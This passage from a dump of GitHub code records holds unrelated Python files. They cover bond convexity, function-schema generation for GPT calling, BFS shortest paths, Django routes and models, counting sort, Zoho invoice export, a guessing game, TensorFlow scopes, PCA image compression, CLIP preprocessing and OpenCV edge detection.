for each level of yield\nbond['price_up'] = -npf.pv((bond['bond_yield']/100)+0.01,30,3.5,100)\nbond['price_down'] = -npf.pv((bond['bond_yield']/100)-0.01,30,3.5,100)\nbond['convexity'] = (bond['price_down'] + bond['price_up'] - 2 * bond['price']) / (bond['price'] * 0.01 ** 2)\n\nprint(bond)\nplt.plot(bond['bond_yield'],bond['convexity'])\nplt.xlabel('Yield (%)')\nplt.ylabel('Convexity')\nplt.show()\n","repo_name":"gastrader/bond_pricing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"28900635943","text":"import sys\nimport re\nimport inspect\n\n\ndef get_func_schema(function: callable) -> dict:\n \"\"\"\n Return the data schema of a function.\n {\n \"function\": function,\n \"description\": \"function description\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"parameter_a\": {\n \"type\": \"str\",\n \"description\": \"parameter_a description\"\n },\n \"parameter_b\": {\n \"type\": \"int\",\n \"description\": \"parameter_b description\"\n },\n \"parameter_c\": {\n \"type\": \"str\",\n \"description\": \"parameter_c description\",\n \"enum\": [\"a\", \"b\", \"c\"]\n },\n },\n \"required\": [\"parameter_a\", \"parameter_b\"]\n }\n }\n \"\"\"\n func_doc = function.__doc__\n # Google Style Docstring\n if func_doc is None:\n raise Exception(\"Function {} has no docstring.\".format(function.__name__))\n func_doc = func_doc.strip().replace(' ','').replace('\\t', '')\n # extract doc of args from docstring\n doc_spt = func_doc.split('\\n\\n')\n desc = doc_spt[0]\n args = doc_spt[1] if len(doc_spt) > 1 else \"\"\n returns = doc_spt[2] if len(doc_spt) > 2 else \"\"\n\n # extract args\n # delete the first line of args\n arg_lines = args.split('\\n')[1:]\n arg_doc_list = re.findall(r'(\\w+)(\\((\\w+)\\))?:\\s*(.*)', args)\n args_doc = {}\n for arg_line in arg_lines:\n doc_tuple = re.findall(r'(\\w+)(\\(([\\w\\[\\]]+)\\))?:\\s*(.*)', arg_line)\n if len(doc_tuple) == 0:\n continue\n args_doc[doc_tuple[0][0]] = doc_tuple[0][3]\n\n # extract returns\n return_doc_list = re.findall(r'(\\w+):\\s*(.*)', returns)\n\n params = enumerate(inspect.signature(function).parameters.values())\n parameters = {\n \"type\": \"object\",\n \"required\": [],\n \"properties\": {},\n }\n\n\n for i, param in params:\n param_type = param.annotation.__name__\n\n type_name_mapping = {\n \"str\": \"string\",\n \"int\": \"integer\",\n \"float\": \"number\",\n \"bool\": \"boolean\",\n \"list\": \"array\",\n \"dict\": \"object\",\n }\n\n if param_type in type_name_mapping:\n param_type = type_name_mapping[param_type]\n\n parameters['properties'][param.name] = {\n \"type\": param_type,\n \"description\": args_doc[param.name],\n }\n\n # add schema for array\n if param_type == \"array\":\n # extract type of array, the int of list[int]\n # use re\n array_type_tuple = re.findall(r'list\\[(\\w+)\\]', str(param.annotation))\n\n array_type = 'string'\n\n if len(array_type_tuple) > 0:\n array_type = array_type_tuple[0]\n\n if array_type in type_name_mapping:\n array_type = type_name_mapping[array_type]\n\n parameters['properties'][param.name][\"items\"] = {\n \"type\": array_type,\n }\n\n if param.default is inspect.Parameter.empty:\n parameters[\"required\"].append(param.name)\n\n return {\n \"function\": function,\n \"description\": desc,\n \"parameters\": parameters,\n }\n\n\nclass Namespace:\n \"\"\"\n Namespace is a virtual container for functions, generated automatically 
by CallingGPT\n    with user provided modules.\n    \"\"\"\n\n    modules: list = []\n    \n    functions: dict = {}\n    \"\"\"Store functions with structure as follows:\n    {\n        \"module_name_a\": {\n            \"function_name_a\": {\n                \"function\": function_a,\n                \"description\": \"function_a description\",\n                \"parameters\": {\n                    \"type\": \"object\",\n                    \"properties\": {\n                        \"parameter_a\": {\n                            \"type\": \"str\",\n                            \"description\": \"parameter_a description\"\n                        },\n                        \"parameter_b\": {\n                            \"type\": \"int\",\n                            \"description\": \"parameter_b description\"\n                        },\n                        \"parameter_c\": {\n                            \"type\": \"str\",\n                            \"description\": \"parameter_c description\",\n                            \"enum\": [\"a\", \"b\", \"c\"]\n                        },\n                    },\n                    \"required\": [\"parameter_a\", \"parameter_b\"]\n                }\n            },\n        }\n    }\n\n    \"\"\"\n\n    def _retrieve_functions(self):\n        self.functions = {}\n        for module in self.modules:\n            # assert module is a module\n            assert isinstance(module, type(sys))\n            # ignore non-function attributes\n            if not hasattr(module, '__functions__'):\n                functions = {k: v for k, v in module.__dict__.items() if callable(v)}\n                # ignore private functions\n                functions = {k: v for k, v in functions.items() if not k.startswith('_')}\n            else:\n                functions = {v.__name__: v for v in module.__functions__ }\n\n            self.functions[module.__name__.replace(\".\",\"-\")] = {}\n\n            for name, function in functions.items():\n                function_dict = get_func_schema(function)\n\n                self.functions[module.__name__.replace(\".\",\"-\")][name] = function_dict\n\n    def __init__(self, modules: list):\n        self.modules = modules\n        self._retrieve_functions()\n\n    @property\n    def functions_list(self):\n        result: list = []\n        for module_name, module in self.functions.items():\n            for function_name, function in module.items():\n                func = function.copy()\n                func[\"name\"] = \"{}-{}\".format(module_name, function_name)\n                del func[\"function\"]\n                result.append(func)\n\n        return result\n    \n    def call_function(self, function_name: str, args: dict):\n        \"\"\"\n        Call a function by name.\n        \"\"\"\n        result = {}\n\n        # split the function name\n        fn_spt = function_name.split('-')\n        module_name = '-'.join(fn_spt[:-1])\n        function_name = fn_spt[-1]\n\n        # get the function\n        function = self.functions[module_name][function_name]['function']\n\n        # call the function\n        result = function(**args)\n\n        return result\n    \n    def add_function(self, module_name: str, function: callable):\n        \"\"\"\n        Add a function to namespace.\n        \"\"\"\n        # assert isinstance(function, callable)\n        if module_name not in self.functions:\n            self.functions[module_name] = {}\n        self.functions[module_name][function.__name__] = get_func_schema(function)\n\n    def add_modules(self, modules: list):\n        \"\"\"\n        Add a module to namespace.\n        \"\"\"\n        self.modules.extend(modules)\n        self._retrieve_functions()\n    ","repo_name":"RockChinQ/CallingGPT","sub_path":"src/CallingGPT/entities/namespace.py","file_name":"namespace.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"86"} +{"seq_id":"5657629131","text":"from queue import Queue\nfrom example_unweighted_graphs import UNDIRECTED_3\nfrom graph_helpers import (\n    InitializeSSSP,\n    GetVertices,\n    ConstructPath,\n    Vertex,\n    UnweightedGraph,\n)\n\n\ndef bfsSSSP(G: UnweightedGraph, start: Vertex):\n    # Notice that @param G is unweighted\n    dist, prev = InitializeSSSP(G, start)\n    queue: Queue[Vertex] = Queue()\n    queue.put(start)\n\n    while not queue.empty():\n        u = queue.get()\n        for adjacent_vertex in G[u]:\n            # if the edge is tense\n            # - weight is 1 for unweighted graphs\n            if dist[u] 
+ 1 < dist[adjacent_vertex]:\n # RelaxEdge()\n dist[adjacent_vertex] = dist[u] + 1\n prev[adjacent_vertex] = u\n queue.put(adjacent_vertex)\n\n return dist, prev\n\n\nif __name__ == \"__main__\":\n start: Vertex = \"S\"\n dist, prev = bfsSSSP(UNDIRECTED_3, start)\n print(f\"dist:{dist}\\nprev:{prev}\\n======\")\n\n for vertex in GetVertices(UNDIRECTED_3):\n if vertex != start:\n print(\n f\"Shortest Path from {start} to {vertex} is {ConstructPath(prev, vertex)}\"\n )\n","repo_name":"tomli380576/ECS122A-Algorithms-python-implementation","sub_path":"Implementations/SSSP-BFS.py","file_name":"SSSP-BFS.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"40343799097","text":"from django.conf import settings\n#from django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.urls import include, path\nfrom django.views import defaults as default_views\nfrom movie.views import HomeView\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n)\nfrom tasks.views import (\n load_data_view,\n load_data1_view,\n load_data2_view,\n load_data3_view,\n)\n\nfrom config.settings.base import env\n\nfrom django.urls import re_path\n\nurlpatterns = [\n path('summernote/', include('django_summernote.urls')),\n path(\"\", HomeView.as_view(), name=\"home\"),\n path(\"load-data/\", load_data_view, name=\"load-data\"),\n path(\"load-data-1/\", load_data1_view, name=\"load-data-1\"),\n path(\"load-data-2/\", load_data2_view, name=\"load-data-2\"),\n path(\"load-data-3/\", load_data3_view, name=\"load-data-3\"),\n # Django Admin, use {% url 'admin:index' %}\n path(settings.ADMIN_URL, admin.site.urls),\n # User management\n path(\"users/\", include(\"cinema.users.urls\", namespace=\"users\")),\n path(\"accounts/\", include(\"allauth.urls\")),\n re_path('^searchableselect/', include('searchableselect.urls')),\n path(\"\", include(\"movie.site_urls\")),\n path(\"\", include(\"offer.site_urls\")),\n path(\"\", include(\"music.site_urls\")),\n path(\"\", include(\"game.site_urls\")),\n path(\"\", include(\"serial.site_urls\")),\n path(\"\", include((\"tasks.urls\", \"tasks\"), namespace=\"tasks\"))\n # Your stuff: custom urls includes go here\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nif settings.DEBUG:\n # Static file serving when using Gunicorn + Uvicorn for local web socket development\n urlpatterns += staticfiles_urlpatterns()\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Cinema API\",\n default_version=env(\"HEROKU_RELEASE_VERSION\", default=\"v1\"),\n description=\"Cinema API\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"info@byt.bz\"),\n license=openapi.License(name=\"MIT License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\n\n# API URLS\nurlpatterns += [\n # API base url\n path(\"api/\", include(\"config.api_router\")),\n # DRF auth token\n path(\"api/token/\", TokenObtainPairView.as_view(), name=\"token_obtain_pair\"),\n path(\"api/token/refresh/\", TokenRefreshView.as_view(), name=\"token_refresh\"),\n path(\"api/token/verify/\", TokenVerifyView.as_view(), name=\"token_verify\"),\n re_path(\n 
r\"^swagger(?P\\.json|\\.yaml)$\",\n schema_view.without_ui(cache_timeout=0),\n name=\"schema-json\",\n ),\n re_path(\n r\"^swagger/$\",\n schema_view.with_ui(\"swagger\", cache_timeout=0),\n name=\"schema-swagger-ui\",\n ),\n re_path(\n r\"^redoc/$\", schema_view.with_ui(\"redoc\", cache_timeout=0), name=\"schema-redoc\"\n ),\n]\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n path(\n \"400/\",\n default_views.bad_request,\n kwargs={\"exception\": Exception(\"Bad Request!\")},\n ),\n path(\n \"403/\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ),\n path(\n \"404/\",\n default_views.page_not_found,\n kwargs={\"exception\": Exception(\"Page not Found\")},\n ),\n path(\"500/\", default_views.server_error),\n ]\n if \"debug_toolbar\" in settings.INSTALLED_APPS:\n import debug_toolbar\n\n urlpatterns = [path(\"__debug__/\", include(debug_toolbar.urls))] + urlpatterns\n","repo_name":"BigCatalyst/VisualesManagement","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74467577565","text":"# counting sort: does not use any comparison operation. Can be within linear time complexity.\n\n# Theorem: any sorting algorithm that uses comparison has minimum time complexity O(n*lg(n)).\n# (can be proven by the decision tree model)\n\n# For an array A of n elements in a range of width k, counting sort has time complexity O(n+k), \n# which can be reduced to O(n) if k is not much larger than n.\n\ndef counting_sort(A):\n \"\"\"\n @brief sort an array in ascending order.\n @params A: array of numbers\n @retval B: array of sorted numbers in A\n \"\"\"\n n = len(A)\n assert (min(A) >= 0)\n k = max(A)\n\n # initialize two arrays B and C\n B = [0 for _ in range(n)] # B is the output array\n C = [0 for _ in range(k+1)] # C[i] is the number of occurence of i in A\n\n # for num in A, count occurence and record in C[num]\n for i in range(n):\n C[A[i]] = C[A[i]] + 1\n \n # C[i] now contains the number of elements equal to i.\n # Now make C[i] contain the number of elements less than or equal to i.\n for i in range(1, k+1):\n C[i] = C[i] + C[i-1]\n \n # put each element in the right place by referring to C\n for i in range(n):\n B[C[A[i]] - 1] = A[i]\n C[A[i]] -= 1 # in case of duplicate elements\n \n return B\n\ndef test():\n test_A = [7, 8, 10, 22, 45, 1, 0, 22, 2, 2, 1, 7, 8]\n if (sorted(test_A) == counting_sort(test_A)):\n print(\"counting_sort succeeded.\")\n print(\"before sorted: \", test_A)\n print(\"after sorted: \", counting_sort(test_A))\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"yumiweidemao/py","sub_path":"intro2algorithms/2_sorting/countingsort.py","file_name":"countingsort.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41620922386","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\n\nfrom django.contrib.auth.models import User\n\n\nclass Blog(models.Model):\n def __unicode__(self):\n return self.name\n\n user = models.ForeignKey(\n User,\n )\n\n name = models.CharField(\n u\"ブログ名\",\n max_length=256\n )\n\n description = models.TextField(\n u\"説明\",\n max_length=1024,\n blank=True\n )\n\n header = models.TextField(\n u\"ヘッダー\",\n 
max_length=1024,\n blank=True\n )\n\n footer = models.TextField(\n u\"フッター\",\n max_length=1024,\n blank=True\n )\n\n created_at = models.DateTimeField(\n u\"作成日時\",\n auto_now_add=True\n )\n\n updated_at = models.DateTimeField(\n u\"更新日時\",\n auto_now=True\n )\n\n class Meta:\n ordering = ['-updated_at']\n verbose_name = u'ブログ'\n verbose_name_plural = u'ブログ'\n\n\nclass Post(models.Model):\n def __unicode__(self):\n return self.title\n\n blog = models.ForeignKey(\n Blog\n )\n\n title = models.CharField(\n u\"タイトル\",\n max_length=255,\n )\n\n contents = models.TextField(\n u\"コンテンツ\",\n )\n\n created_at = models.DateTimeField(\n u\"作成日時\",\n auto_now_add=True\n )\n\n updated_at = models.DateTimeField(\n u\"更新日時\",\n auto_now=True\n )\n\n class Meta:\n ordering = ['-updated_at']\n verbose_name = u'投稿'\n verbose_name_plural = u'投稿'","repo_name":"masaki-sato/django-sample","sub_path":"blog/cms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34916019434","text":"from zoho import *\nfrom openpyxl import Workbook\nfrom datetime import datetime\n\n\nexcel_header = [\"Date\", \"Order-Id\", \"Buyer Org Name\", \"Buyer Ph Num\", \"Buyer GSTIN\", \"Fulfill\", \"Order Line Id\", \"ListingId\", \"Product Id\", \"Product Title\",\"Is A Set\",\"Size of Set\",\"Hsn\",\"Cess %\",\"Gst %\",\"Total Units\",\"Unit Of Measurement\",\"Unit Price (Rs.) (Inclusive Taxes)\",\"Invoice Id\",\"No. of Boxes\",\"Total weight of Boxes (Kg)\",\"Order Notes\"]\n\ninvoice_api = zoho_books.get_invoices_api()\n\n\ndef get_invoice_by_number(invoice_number):\n invoice = invoice_api.get_invoices({'invoice_number': invoice_number}).get_invoices()[0]\n invoice_details = invoice_api.get(invoice.invoice_id)\n return invoice_details\n\n\ndef get_custom_field_value(invoice, field_name, defaultValue=None):\n fields = invoice.get_custom_fields()\n for field in fields:\n if field.get_label() == field_name:\n return field.get_value()\n return defaultValue\n\n\ndef generate_file(invoice_number, output_path='shipping_label.xlsx'):\n book = Workbook()\n sheet = book.active\n sheet.append(excel_header)\n print(\"Looking for Invoice Number: {}\".format(invoice_number))\n invoice = get_invoice_by_number(invoice_number)\n first = True\n for line_item in invoice.line_items:\n row = []\n row.append(datetime.strptime(invoice.get_date(), '%Y-%m-%d').strftime('%d-%b-%Y 10:00'))\n row.append(get_custom_field_value(invoice, 'Udaan Order ID', ''))\n row.append(invoice.get_customer_name())\n row.append('+91-{}'.format(invoice.get_contact_persons()[0]['mobile']))\n row.append(invoice.gst_no)\n row.append('Yes')\n item_id = 'TLHKP{0}{0}'.format(line_item.line_item_id)[:31]\n row.append(item_id)\n row.append(item_id)\n row.append(item_id)\n row.append(line_item.name)\n row.append('No')\n row.append('NA')\n row.append(line_item.get_hsn_or_sac())\n row.append(0)\n row.append(line_item.tax_percentage)\n row.append(line_item.quantity)\n row.append('Pieces')\n if str(line_item.discount).endswith('%'):\n discount_percent = float(line_item.discount[:-1])\n else:\n discount_percent = float(line_item.discount)\n discounted_rate = round((line_item.rate * (100 - discount_percent) / 100.0), 2)\n row.append(round(discounted_rate * (100 + line_item.tax_percentage) / 100.0, 2))\n row.append(invoice.invoice_number[3:])\n if first:\n first = False\n row.append(get_custom_field_value(invoice, 'No of Boxes', 1))\n 
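# (Editor's note, illustrative numbers only.) The unit price appended above is
# discount-adjusted and tax-inclusive: for rate=100.0, discount='10%' and
# tax_percentage=18 the code computes discounted_rate = round(100.0 * (100 - 10) / 100.0, 2) == 90.0
# and then appends round(90.0 * (100 + 18) / 100.0, 2) == 106.2 as the price.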
row.append(get_custom_field_value(invoice, 'Total Weight', 5))\n        sheet.append(row)\n    book.save(output_path)\n    return output_path\n\n\ndef generate_files(invoice_number):\n    file_path_format = 'invoice_file_{}.xlsx'\n    output_file = generate_file(invoice_number, file_path_format.format(invoice_number))\n    return output_file\n","repo_name":"deepubansal/udaan-zoho-integration","sub_path":"zoho/invoicing/generate_rts_file.py","file_name":"generate_rts_file.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25466000960","text":"import random\n\ndef is_valid(str: str,max:int)->bool:\n    if str.isdigit():\n        if 1<=int(str)<=max:\n            return True\n    return False\n\nprint('Добро пожаловать в числовую угадайку')\nprint ('Введите правую границу:')\nmax=0\nwhile True:\n    max=input()\n    if max.isdigit():\n        max=int(max)\n        if max>1:\n            break\n\nnum=random.randint(1,max)\nprint ('Введите число:')\ncount_try=0\nwhile True:\n    count_try +=1\n    while True:\n        num_str=input()\n        if is_valid(num_str,max):\n            num_user=int(num_str)\n            break\n        else:\n            print(f'А может быть все-таки введем целое число от 1 до {max}?')\n    if num_user==num:\n        print (f'Вы угадали, поздравляем! (попыток:{count_try})')\n        print ('Сыграем еще?(y/n)')\n        answer_user=''\n        while answer_user not in ['y','n']:\n            answer_user=input()\n        if answer_user=='n':\n            break\n        else:\n            num = random.randint(1, max)\n            print('Введите число:')\n            count_try = 0\n    elif num>num_user:\n        print('Ваше число меньше загаданного, попробуйте еще')\n    else:\n        print('Ваше число больше загаданного, попробуйте еще')\nprint('Спасибо, что играли в числовую угадайку. Еще увидимся...')","repo_name":"Tituchenko/StepikPython","sub_path":"guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"4208101049","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport cv2\n\n\n#data:1行为一个特征,1列为一个样本\ndef PCA(data,k): #代表被压缩到k维\n    mean_data = np.mean(data,axis=0) #被压缩到1行\n    mean_removed = data - mean_data #去均值\n    cov_mean_removed = np.cov(mean_removed)\n    eigvals,eigvects = np.linalg.eig(cov_mean_removed) #特征值和特征向量\n    eigvals_Loc = np.argsort(eigvals)\n    eigvals_Loc_max_k = eigvals_Loc[:-(k+1):-1] #返回k个最大特征值下标\n    eigvects_max_k = eigvects[:,eigvals_Loc_max_k] #返回k个最大特征值对应的特征向量\n    lower_data = np.dot(eigvects_max_k.T,mean_removed) #降维后的数据集\n    re_data = np.dot(eigvects_max_k,lower_data)+mean_data #重构原data\n    return lower_data,re_data\n\n#二维绘图\ndef draw0(data):\n    rows, cols = data.shape\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    for i in range(cols):\n        ax.scatter(data[0,i],data[1,i],color='red')\n    ax.set_title('2D')\n    plt.show()\n    return\n\n#三维绘图\ndef draw1(data):\n    rows, cols = data.shape\n    fig = plt.figure()\n    ax = Axes3D(fig)\n    for i in range(cols):\n        ax.scatter(data[0,i],data[1,i],data[2,i],color='red')\n    ax.set_xlabel('X Label')\n    ax.set_ylabel('Y Label')\n    ax.set_zlabel('Z Label')\n    ax.set_title('3D')\n    plt.show()\n    return\n\n#计算峰值信噪比PSNR\ndef cal_PSNR(data1,data2):\n    raws = data1.shape[0]\n    cols = data1.shape[1]\n    noise = data2 - data1\n    sum = 0\n    for i in range(raws):\n        for j in range(cols):\n            sum += np.abs(noise[i][j])\n    MSE = sum/(raws*cols)\n    PSNR = 20 * np.log10(255/np.sqrt(MSE))\n    return np.round(PSNR,2)\n\n# #计算PSNR\n# def cal_psnr(img1, img2):\n#     mse = np.mean((img1 / 255. 
- img2 / 255.) ** 2)\n# if mse < 1.0e-10:\n# return 100\n# PIXEL_MAX = 1\n# return 20 * math.log10(PIXEL_MAX / math.sqrt(mse))\n\n#自己生成数据进行降维测试\ndef my_PCA():\n mean = (5, 1, 10)\n cov = [[5, 0, 0], [0, 0.01, 0], [0, 0, 6]]\n size = 100\n np.random.seed(0)\n data = np.random.multivariate_normal(mean, cov, size)\n data = data.T\n draw1(data)\n lower_data, re_data = PCA(data, 2) # 三维降到二维\n draw0(lower_data)\n return\n\ndef photo_PCA():\n k = 1\n pra = 1 #图片缩放比例\n\n img = cv2.imread('1.JPG')\n # img = cv2.imread('2.JPG')\n # img = cv2.imread('3.JPG')\n rows = img.shape[0]\n cols = img.shape[1]\n img_resize = cv2.resize(img,(int(pra*cols),int(pra*rows))) #经测试,cols和rows的顺序应该是这样,缩放图片\n img_gray = cv2.cvtColor(img_resize,cv2.COLOR_BGR2GRAY) #转换为单通道灰度图\n print(img_gray.shape[0],img_gray.shape[1])\n # cv2.imshow(\"Original\", img_gray)\n # cv2.waitKey(0)\n plt.imshow(img_gray, cmap='gray')\n plt.title('Original')\n plt.show()\n\n Rows = img_gray.shape[0]\n Cols = img_gray.shape[1]\n data = img_gray\n print(data) #打印原灰度图片矩阵\n\n lower_data,re_data = PCA(data,k)\n re_data = np.real(re_data)\n\n #只能取整数,但仍为float64型\n for i in range(Rows):\n for j in range(Cols):\n re_data[i][j] = int(re_data[i][j])\n #特殊方法转换\n re_data = re_data.astype(int)\n print(re_data)\n\n PSNR = cal_PSNR(data, re_data)\n print()\n print(\"信噪比:\", PSNR)\n\n plt.imshow(re_data,cmap='gray')\n plt.title(\"k={},PSNR={}\".format(str(k),str(PSNR)))\n plt.show()\n #调cv库有问题\n # cv2.imshow(\"Restored\", re_data)\n # cv2.waitKey(0)\n\n return\n\n\n# my_PCA() #我写的是3维-2维\nphoto_PCA()","repo_name":"Yuuhooow/HIT-ML_Labs-2020","sub_path":"Lab4_PCA/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"38388408627","text":"from typing import Optional, Tuple\n\nimport torch\n\nfrom torchvision.transforms import (\n Normalize,\n Compose,\n InterpolationMode,\n Resize,\n CenterCrop,\n)\n\nfrom open_clip.constants import OPENAI_DATASET_MEAN, OPENAI_DATASET_STD\n\n\ndef image_transform(\n image_size: int,\n mean: Optional[Tuple[float, ...]] = None,\n std: Optional[Tuple[float, ...]] = None,\n):\n mean = mean or OPENAI_DATASET_MEAN\n if not isinstance(mean, (list, tuple)):\n mean = (mean,) * 3\n\n std = std or OPENAI_DATASET_STD\n if not isinstance(std, (list, tuple)):\n std = (std,) * 3\n\n if isinstance(image_size, (list, tuple)) and image_size[0] == image_size[1]:\n # for square size, pass size as int so that\n # Resize() uses aspect preserving shortest edge\n image_size = image_size[0]\n\n normalize = Normalize(mean=mean, std=std)\n\n def convert_from_uint8_to_float(image: torch.Tensor) -> torch.Tensor:\n if image.dtype == torch.uint8:\n return image.to(torch.float32) / 255.0\n else:\n return image\n\n return Compose(\n [\n convert_from_uint8_to_float,\n Resize((image_size, image_size), interpolation=InterpolationMode.BICUBIC),\n CenterCrop(image_size),\n normalize,\n ]\n )\n","repo_name":"AlignmentResearch/vlmrm","sub_path":"src/vlmrm/contrib/open_clip/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"86"} +{"seq_id":"72591309404","text":"# 1160. 
Find Words That Can Be Formed by Characters\n\nfrom collections import Counter\n\n\ndef countCharacters(words, chars):\n len_good_str = 0\n chars_counter = Counter(chars)\n for word in words:\n good_str = True\n word_counter = Counter(list(word))\n for key in word_counter.keys():\n if key not in chars_counter:\n good_str = False\n break\n else:\n if chars_counter[key] < word_counter[key]:\n good_str = False\n break\n if good_str:\n len_good_str += len(word)\n\n return len_good_str\n\n\nwords = [\"hello\", \"world\", \"leetcode\"] # [\"cat\", \"bt\", \"hat\", \"tree\"]\nchars = \"welldonehoneyr\" # \"atach\"\nprint(countCharacters(words=words, chars=chars))\n","repo_name":"HaykSahakyan11/Machine_Learning_2","sub_path":"practical_5/Find Words That Can Be Formed by Characters.py","file_name":"Find Words That Can Be Formed by Characters.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1294112938","text":"import tensorflow as tf\n\n# 当命名空间reuse为默认(False)时,get_variable和Variable效果一样\nv = tf.get_variable(\"v\", shape=[1], initializer=tf.constant_initializer(1.0))\n\n# with tf.Session() as sess:\n# init_op = tf.global_variables_initializer()\n# sess.run(init_op)\n# print(sess.run(v)) # 输出[1.]\n# print(v) # 输出,表明是在空的命名空间中生成的变量\n#\n# with tf.variable_scope(\"foo\"):\n# v = tf.get_variable(\"v\", [1], initializer=tf.constant_initializer(1.0))\n# print(v) # 输出,表明是在foo的命名空间中生成的变量\n#\n# with tf.variable_scope(\"foo\", reuse=True): # 使用reuse时,使用get_variable()会直接获取相应的变量,如果没有会直接报错\n# v1 = tf.get_variable(\"v\", [1])\n# print(v1 == v)\n\nprint(\"---------------------------------------------------\")\nprint(v.name)\n# 嵌套使用命名空间\nwith tf.variable_scope(\"root\"):\n print(tf.get_variable_scope().reuse) # False\n v2 = tf.get_variable(\"v\", [1])\n print(v2.name)\n with tf.variable_scope(\"foo\", reuse=True): # True\n print(tf.get_variable_scope().reuse)\n\n with tf.variable_scope(\"bar\"): # False\n print(tf.get_variable_scope().reuse)\n\n print(tf.get_variable_scope().reuse) # False\n\n\n# 对tensorflow_train_network中inference函数的改进,让它可以接受更少的参数\ndef inference(input_tensor, reuse=False):\n with tf.variable_scope(\"layer1\", reuse=reuse):\n weights = tf.get_variable(\"weights\")\n biases = tf.get_variable(\"biases\")\n layer1 = tf.nn.relu(tf.matmul(input_tensor, weights) + biases)\n return layer1\n","repo_name":"hxz1998/deeplearning_learning","sub_path":"chapter-5/variable_management.py","file_name":"variable_management.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32790494300","text":"import os\nimport cv2\nfrom os.path import join\nfrom train_validation_test_split import make_dirs\n\ndef edgeDetection(directory):\n # directory 에 해당하는 파일들을 files로 전부 불러옴\n # files = os.listdir(directory)\n files = [f for f in os.listdir(directory) if os.path.isfile(join(directory, f))]\n for name in files:\n path = join(directory, name) # dataset/whole/[name]\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n # Sobel 필터 적용\n sobelx = cv2.Sobel(img, cv2.CV_64F, 1, 0, ksize=3)\n sobely = cv2.Sobel(img, cv2.CV_64F, 0, 1, ksize=3)\n sobelxy = sobelx + sobely\n cv2.imwrite(join(directory, 'edge_detection_SobelX', name) , sobelx)\n cv2.imwrite(join(directory, 'edge_detection_SobelY', name) , sobely)\n cv2.imwrite(join(directory, 'edge_detection_SobelXY', name) , sobelxy)\n\n # Scharr 필터 적용\n scharrx = cv2.Scharr(img, cv2.CV_64F, 
1, 0)\n        scharry = cv2.Scharr(img, cv2.CV_64F, 0, 1)\n        scharrxy = scharrx + scharry\n        cv2.imwrite(join(directory, 'edge_detection_ScharrX', name) , scharrx)\n        cv2.imwrite(join(directory, 'edge_detection_ScharrY', name) , scharry)\n        cv2.imwrite(join(directory, 'edge_detection_ScharrXY', name) , scharrxy)\n\n        laplacian = cv2.Laplacian(img, cv2.CV_64F)\n        cv2.imwrite(join(directory, 'edge_detection_Laplacian', name) , laplacian)\n        # Canny 필터 적용\n        # 두 번째 인자가 일정 임계값 보다 낮으면 엣지로 추출 x, 세 번째 인자는 일정 임계값보다 높으면 무조건 엣지로 추출\n        # cannyxy = cv2.Canny(img, 50, 115)\n        # cv2.imwrite(join(directory, 'edge_detection_Canny2', name) , cannyxy)\n\npath = 'dataset/whole'\nmake_dirs(path, 'edge_detection_SobelX')\nmake_dirs(path, 'edge_detection_SobelY')\nmake_dirs(path, 'edge_detection_SobelXY')\n\nmake_dirs(path, 'edge_detection_ScharrX')\nmake_dirs(path, 'edge_detection_ScharrY')\nmake_dirs(path, 'edge_detection_ScharrXY')\n\nmake_dirs(path, 'edge_detection_Laplacian')\n# make_dirs(path, 'edge_detection_Canny2')\n\nedgeDetection(path)","repo_name":"skatld123/Diamond_Wire_Classification","sub_path":"edge_detection.py","file_name":"edge_detection.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} 